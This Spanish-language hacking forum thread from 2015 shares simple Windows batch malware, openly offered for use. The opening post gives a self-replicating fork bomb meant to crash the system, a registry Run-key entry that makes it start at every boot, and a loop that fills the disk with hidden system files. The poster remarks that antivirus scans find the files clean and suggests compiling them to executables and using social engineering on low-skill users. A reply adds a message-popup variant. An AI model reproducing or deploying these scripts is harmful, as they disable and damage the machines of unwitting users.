comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Malware sencillo

  • 3 Respuestas
  • 2513 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Conectado rollth

  • *
  • Underc0der
  • Mensajes: 875
  • Actividad:
    1.67%
  • Reputación 16
  • El conocimiento es libre.
    • Ver Perfil
    • Whateversec
    • Email
  • Twitter: @RoloMijan
« en: Enero 07, 2015, 07:41:11 am »
Buenas a todos os traigo un malware sencillo hecho en batch.

Archivo won.bat:

Código: DOS
  1. @You are not allowed to view links. Register or Login off
  2. :va
  3. start won.bat
  4. You are not allowed to view links. Register or Login va
  5. You are not allowed to view links. Register or Login
  6.  

Esto lo que hace es abrir muchas veces ese mismo archivo (que a su vez abriria otra vez el mismo archivo) hasta que colapse el sistema, el problema que esto asi esta muy feo, entonces se crea este otro archivo.

Archivo registro.bat:

Código: DOS
  1. @You are not allowed to view links. Register or Login off
  2. You are not allowed to view links. Register or Login lugar=%CD%\won.bat
  3. REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v IniciarProgramas /t REG_SZ /d "%lugar%"
  4. start won.bat
  5. You are not allowed to view links. Register or Login
  6.  

Este segundo archivo modifica el registro para que cuando se abra windows se abra el archivo directamente, y despues se abre el archivo (por si lo borra)

PD: Si abre desde modo seguro no se abrira el archivo.
PD2: Según vt los dos archivos están limpios.

EDITO

Hay una tercera opción, seria hacerlo todo en un solo archivo.

Archivo won.bat:

Código: DOS
  1. @You are not allowed to view links. Register or Login off
  2. You are not allowed to view links. Register or Login lugar=%CD%\won.bat
  3. REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v IniciarProgramas /t REG_SZ /d "%lugar%" /f
  4. :va
  5. start won.bat
  6. You are not allowed to view links. Register or Login va
  7. You are not allowed to view links. Register or Login
  8.  

EDITO 2

Otra forma de  hacerlo en un solo archivo

Código: DOS
  1. @You are not allowed to view links. Register or Login off
  2. You are not allowed to view links. Register or Login lugar=%CD%\won.bat
  3. You are not allowed to view links. Register or Login lugar1=%CD%\hola.txt
  4. You are not allowed to view links. Register or Login You are not allowed to view links. Register or Login %lugar1% (You are not allowed to view links. Register or Login va) You are not allowed to view links. Register or Login (You are not allowed to view links. Register or Login install)
  5. :install
  6. REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v IniciarProgramas /t REG_SZ /d "%lugar%"
  7. You are not allowed to view links. Register or Login hola > hola.txt
  8. :va
  9. start "won.bat"
  10. You are not allowed to view links. Register or Login va
  11. You are not allowed to view links. Register or Login
  12.  

EDITO 3

Otro codigo que lo que hace es ir llenandonos poco a poco la memoria del disco duro.

Código: DOS
  1. @You are not allowed to view links. Register or Login off
  2. :bucle
  3. You are not allowed to view links. Register or Login N=%random%%random%%random%.txt
  4. You are not allowed to view links. Register or Login  >> %N%
  5. attrib +r +s +h %N%.txt
  6. You are not allowed to view links. Register or Login bucle

Código: DOS
  1. @You are not allowed to view links. Register or Login off
  2. :bucle
  3. You are not allowed to view links. Register or Login N = 0
  4. start a.bat
  5. You are not allowed to view links. Register or Login N = %N%+1
  6. You are not allowed to view links. Register or Login %N% == 50 (You are not allowed to view links. Register or Login You are not allowed to view links. Register or Login) You are not allowed to view links. Register or Login You are not allowed to view links. Register or Login bucle
  7. :You are not allowed to view links. Register or Login
  8. You are not allowed to view links. Register or Login

Código: DOS
  1. @You are not allowed to view links. Register or Login off
  2. You are not allowed to view links. Register or Login a.abt C:\
  3. You are not allowed to view links. Register or Login b.abt C:\
  4. You are not allowed to view links. Register or Login C:\
  5. You are not allowed to view links. Register or Login lugar=%CD%\b.bat
  6. REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v IniciarProgramas /t REG_SZ /d "%lugar%"
  7. start b.bat
  8. You are not allowed to view links. Register or Login
« Última modificación: Enero 20, 2015, 08:08:46 pm por rollth »

Rollth
Buen hacker mejor persona.
You are not allowed to view links. Register or Login
You are not allowed to view links. Register or Login
You are not allowed to view links. Register or Login

Conectado DeBobiPro

  • *
  • Underc0der
  • Mensajes: 205
  • Actividad:
    1.67%
  • Reputación 2
  • Como no sabía que era imposible, lo hice.
    • Ver Perfil
« Respuesta #1 en: Enero 07, 2015, 09:18:31 am »
yo una vez hice uno así, pero le agregue lo siguiente

Código: DOS
  1. @You are not allowed to view links. Register or Login off
  2. :va
  3. msg * <algún mensaje>
  4. start won.bat
  5. You are not allowed to view links. Register or Login va
  6. You are not allowed to view links. Register or Login
  7.  

así salta el mensaje por cada vez que se abre , una tontera la verdad jaja


Saludos bro!

Nivel 77 You are not allowed to view links. Register or Login

Desconectado OnTheCore

  • *
  • Underc0der
  • Mensajes: 58
  • Actividad:
    0%
  • Reputación 1
    • Ver Perfil
« Respuesta #2 en: Enero 07, 2015, 11:50:02 pm »
Vamos, eso no es malware, es un script molesto nada mas.

Conectado rollth

  • *
  • Underc0der
  • Mensajes: 875
  • Actividad:
    1.67%
  • Reputación 16
  • El conocimiento es libre.
    • Ver Perfil
    • Whateversec
    • Email
  • Twitter: @RoloMijan
« Respuesta #3 en: Enero 08, 2015, 07:45:21 am »
You are not allowed to view links. Register or Login
Vamos, eso no es malware, es un script molesto nada mas.

Hombre  el malware es software que produce daños sin consentimiento del usuario, si en en lugar de bat lo compilas en un .exe (libreria <stdlib.h> en c y la funcion system("")) con un poco de ingenieria social puede llegar a ser muy molesto para un usuario de bajos conocimientos.

Rollth
Buen hacker mejor persona.
You are not allowed to view links. Register or Login
You are not allowed to view links. Register or Login
You are not allowed to view links. Register or Login

 

¿Te gustó el post? COMPARTILO!



Malware "con" CriptoWall

Iniciado por blackdrake

Respuestas: 11
Vistas: 4729
Último mensaje Junio 16, 2018, 03:09:02 pm
por KiddArabic
Tutoriales de análisis de malware: un enfoque de ingeniería inversa

Iniciado por Jean Grey

Respuestas: 0
Vistas: 739
Último mensaje Diciembre 13, 2017, 05:18:08 pm
por Jean Grey
theZoo - Repositorio de malware para análisis e investigación

Iniciado por ANTRAX

Respuestas: 5
Vistas: 1515
Último mensaje Febrero 19, 2018, 08:34:57 pm
por Lautaro Culic'
Otra modalidad malware para conocer de PowerPoint

Iniciado por xhc1

Respuestas: 2
Vistas: 1791
Último mensaje Agosto 23, 2017, 12:58:51 pm
por M03's
FlareVM - Maquina Virtual para analizar Malware

Iniciado por xyz

Respuestas: 1
Vistas: 749
Último mensaje Enero 07, 2018, 12:43:25 pm
por K A I L